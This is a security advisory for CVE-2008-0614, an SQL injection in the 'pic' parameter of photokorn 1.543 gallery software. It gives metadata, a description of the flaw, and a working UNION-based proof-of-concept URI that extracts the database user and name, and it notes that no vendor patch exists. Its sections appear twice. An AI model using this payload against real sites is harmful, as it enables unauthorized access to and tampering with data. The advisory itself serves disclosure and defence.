photokorn 'pic' Parameter SQL Injection Vulnerability
BID:27627
Info
photokorn 'pic' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27627 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0614 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 05 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | you_kn0w is credited with the discovery of this vulnerability. |
| Vulnerable: |
KEIL Software photokorn 1.543 |
| Not Vulnerable: | |
Discussion
photokorn 'pic' Parameter SQL Injection Vulnerability
The photokorn gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects photokorn 1.543; other versions may also be vulnerable.
The photokorn gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects photokorn 1.543; other versions may also be vulnerable.
Exploit / POC
photokorn 'pic' Parameter SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1/*
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1/*
Solution / Fix
photokorn 'pic' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
photokorn 'pic' Parameter SQL Injection Vulnerability
References:
References:
- photokorn Homepage (KEIL Software)